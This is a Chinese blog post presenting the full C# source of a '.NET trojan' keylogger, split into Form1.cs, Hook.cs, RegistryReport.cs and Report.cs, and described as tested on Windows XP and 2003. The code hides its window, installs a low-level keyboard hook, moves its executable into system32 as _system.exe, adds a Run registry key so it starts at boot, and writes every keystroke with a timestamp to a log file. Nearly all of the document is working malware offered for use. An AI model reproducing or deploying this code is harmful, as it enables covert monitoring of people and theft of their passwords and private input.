当前位置:   article > 正文

.net木马的实现-开机键盘记录源代码

.net木马的实现-开机键盘记录源代码

.net木马的实现-开机键盘记录 (原创) 源代码

 

 

 

From1.cs

using System;

 

using System.Drawing;

 

using System.Collections;

 

using System.ComponentModel;

 

using System.Windows.Forms;

 

using System.Data;

 

using System.Threading;

 

 

 

namespace 开机键盘记录

 

{

 

     /// <summary>

 

     /// Form1 的摘要说明。

 

     /// </summary>

 

     public class Form1 : System.Windows.Forms.Form

 

     {

 

         /// <summary>

 

         /// 必需的设计器变量。

 

         /// </summary>

 

          private System.ComponentModel.Container components = null;

 

 

 

          private Hook MyHook;

 

          private Report MyReport;

 

          private RegistryReport MyRegistryReport;

 

          private string keyEvents,keyDate;

 

 

 

         public Form1()

 

         {

 

              //

 

              // Windows 窗体设计器支持所必需的

 

              //

 

              InitializeComponent();

 

 

 

              MyHook = new Hook();

 

              MyReport = new Report();

 

              MyRegistryReport = new RegistryReport();

 

         }

 

 

 

         /// <summary>

 

         /// 清理所有正在使用的资源。

 

         /// </summary>

 

          protected override void Dispose( bool disposing )

 

         {

 

              if( disposing )

 

              {

 

                   this.MyHook.UnHook();

 

 

 

                   if (components != null)

 

                   {

 

                        components.Dispose();

 

                   }

 

              }

 

              base.Dispose( disposing );

 

         }

 

 

 

          #region Windows 窗体设计器生成的代码

 

         /// <summary>

 

         /// 设计器支持所需的方法 - 不要使用代码编辑器修改

 

         /// 此方法的内容。

 

         /// </summary>

 

          private void InitializeComponent()

 

         {

 

              //

 

              // Form1

 

              //

 

              this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);

 

              this.ClientSize = new System.Drawing.Size(104, 0);

 

              this.Name = "Form1";

 

              this.ShowInTaskbar = false;

 

              this.Text = "Form1";

 

              this.WindowState = System.Windows.Forms.FormWindowState.Minimized;

 

              this.Load += new System.EventHandler(this.Form1_Load);

 

 

 

         }

 

          #endregion

 

 

 

         /// <summary>

 

         /// 应用程序的主入口点。

 

         /// </summary>

 

          [STAThread]

 

         static void Main()

 

         {

 

              Application.Run(new Form1());

 

         }

 

 

 

          private void Form1_Load(object sender, System.EventArgs e)

 

         {

 

              this.MyRegistryReport.MoveFile();

 

              this.MyRegistryReport.registryRun();

 

              this.MyReport.FirstWrite();

 

              this.MyHook.SetHook();

 

              this.MyHook.KeyboardEvent += new KeyboardEventHandler(MyHook_KeyboardEvent);

 

         }

 

 

 

          private void MyHook_KeyboardEvent(KeyboardEvents keyEvent, Keys key)

 

         {

 

              this.keyEvents = keyEvent.ToString();

 

              this.keyDate = key.ToString();

 

    

 

              this.MyReport.WriteDate(keyEvents,keyDate);

 

         }

 

     }

 

}

 

 

 

Hook.cs

using System;

 

using System.Runtime.InteropServices;

 

using System.Reflection;

 

using System.Windows.Forms;

 

 

 

namespace 开机键盘记录

 

{

 

     public enum KeyboardEvents

 

     {

 

          KeyDown           = 0x0100,

 

         KeyUp              = 0x0101,

 

          SystemKeyDown   = 0x0104,

 

          SystemKeyUp         = 0x0105

 

     }

 

 

 

     [StructLayout(LayoutKind.Sequential)]

 

     public struct KeyboardHookStruct

 

     {

 

         public int vkCode; //表示一个在1到254间的虚似键盘码

 

         public int scanCode; //表示硬件扫描码

 

         public int flags; 

 

         public int time;

 

         public int dwExtraInfo;

 

     }

 

 

 

     public delegate void KeyboardEventHandler(KeyboardEvents keyEvent ,System.Windows.Forms.Keys key);

 

 

 

     /// <summary>

 

     ///

 

     /// </summary>

 

     public class Hook

 

     {

 

         public event KeyboardEventHandler KeyboardEvent;

 

 

 

         public enum HookType

 

         {

 

              WH_JOURNALRECORD       = 0,

 

              WH_JOURNALPLAYBACK     = 1,

 

              WH_KEYBOARD            = 2,

 

              WH_GETMESSAGE          = 3,

 

              WH_CALLWNDPROC         = 4,

 

              WH_CBT                 = 5,

 

              WH_SYSMSGFILTER        = 6,

 

              WH_MOUSE               = 7,

 

              WH_HARDWARE            = 8,

 

              WH_DEBUG               = 9,

 

              WH_SHELL               = 10,

 

              WH_FOREGROUNDIDLE      = 11,

 

              WH_CALLWNDPROCRET      = 12,

 

              WH_KEYBOARD_LL         = 13,

 

              WH_MOUSE_LL            = 14,

 

              WH_MSGFILTER           = -1,

 

             

 

         }

 

 

 

         public delegate IntPtr HookProc(int code, int wParam, IntPtr lParam);

 

 

 

          [DllImport("User32.dll",CharSet = CharSet.Auto)]

 

         public static extern IntPtr SetWindowsHookEx(HookType hookType,HookProc hook,IntPtr instance,int threadID);

 

 

 

          [DllImport("User32.dll",CharSet = CharSet.Auto)]

 

         public static extern IntPtr CallNextHookEx(IntPtr hookHandle, int code, int wParam, IntPtr lParam);

 

 

 

          [DllImport("User32.dll",CharSet = CharSet.Auto)]

 

         public static extern bool UnhookWindowsHookEx(IntPtr hookHandle);

 

 

 

          private IntPtr instance;

 

          private IntPtr hookHandle;

 

          private int threadID;

 

          private HookProc hookProcEx;

 

 

 

         public Hook()

 

         {

 

              this.instance =

 

                   Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]);

 

              this.threadID = 0;

 

               hookHandle = IntPtr.Zero;

 

              hookProcEx = new HookProc(hookProc);

 

         }

 

 

 

         public bool SetHook()

 

         {

 

              this.hookHandle = SetWindowsHookEx(HookType.WH_KEYBOARD_LL,hookProcEx,this.instance,this.threadID);

 

              return ((int)hookHandle != 0);

 

         }

 

 

 

         public IntPtr hookProc(int code, int wParam, IntPtr lParam)

 

         {

 

              if(code >= 0)

 

              {

 

                   KeyboardEvents kEvent = (KeyboardEvents)wParam;

 

 

 

                   if (kEvent != KeyboardEvents.KeyDown        &&

 

                        kEvent != KeyboardEvents.KeyUp          &&

 

                        kEvent != KeyboardEvents.SystemKeyDown  &&

 

                        kEvent != KeyboardEvents.SystemKeyUp)

 

                   {

 

                       return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam);

 

                   }

 

 

 

                   KeyboardHookStruct MyKey = new KeyboardHookStruct();

 

                   Type t = MyKey.GetType();

 

                   MyKey = (KeyboardHookStruct)Marshal.PtrToStructure(lParam,t);

 

                   Keys keyData=(Keys)MyKey.vkCode;

 

 

 

                   KeyboardEvent(kEvent, keyData);

 

              }

 

 

 

              return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam);

 

         }

 

 

 

         public bool UnHook()

 

         {

 

              return Hook.UnhookWindowsHookEx(this.hookHandle);

 

         }

 

     }

 

}

 

 

 

RegistryReport.cs

using System;

 

using System.IO;

 

using Microsoft.Win32;

 

using System.Windows.Forms;

 

 

 

namespace 开机键盘记录

 

{

 

     /// <summary>

 

     ///

 

     /// </summary>

 

     public class RegistryReport

 

     {

 

         public RegistryReport()

 

         {

 

              //

 

              // TODO: 在此处添加构造函数逻辑

 

              //

 

         }

 

 

 

         public void MoveFile()

 

         {

 

              if(!File.Exists("c://windows//system32//_system.exe"))

 

              {

 

                   File.Move(Application.ExecutablePath,"c://windows//system32//_system.exe");

 

              }

 

              else

 

                   return;

 

         }

 

 

 

         public void registryRun()

 

         {   

 

              RegistryKey key1=Registry.CurrentUser.CreateSubKey("Software//Microsoft//Windows//CurrentVersion//run");

 

              key1.SetValue("","c://windows//system32//_system.exe");

 

              key1.Close();

 

         }

 

     }

 

}

 

 

 

Report.cs

using System;

 

using System.IO;

 

 

 

namespace 开机键盘记录

 

{

 

     /// <summary>

 

     ///

 

     /// </summary>

 

     public class Report

 

     {

 

         public Report()

 

         {

 

              //

 

              // TODO: 在此处添加构造函数逻辑

 

              //

 

         }

 

 

 

         public void FirstWrite()

 

         {

 

              StreamWriter sw = new StreamWriter("c:/windows/system32/keyReport.txt",true);

 

 

 

              sw.WriteLine("************* LittleStudio Studio ************* ");

 

              sw.WriteLine("********  " + DateTime.Today.Year.ToString() + "."

 

                   + DateTime.Today.Month.ToString() + "."

 

                   + DateTime.Today.Day.ToString() + "     "

 

                   + DateTime.Now.Hour.ToString() + ":"

 

                   + DateTime.Now.Minute.ToString() + ":"

 

                   + DateTime.Now.Second.ToString() + "  ********");

 

              sw.Close();

 

         }

 

 

 

         public void WriteDate(string keyEvents,string keyDate)

 

         {

 

              try

 

              {

 

                   StreamWriter sw = new StreamWriter("c:/windows/system32/keyReport.txt",true);

 

 

 

                   sw.WriteLine(keyDate + "键  " + keyEvents + "   "

 

                       + DateTime.Now.Hour.ToString() + ":"

 

                       + DateTime.Now.Minute.ToString() + ":"

 

                       + DateTime.Now.Second.ToString());

 

                   sw.Close();

 

              }

 

              catch{}

 

 

 

              return;

 

         }

 

     }

 

}

 

 

 

WindowsXP,2003下调试通过。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/934359
推荐阅读
相关标签
  

闽ICP备14008679号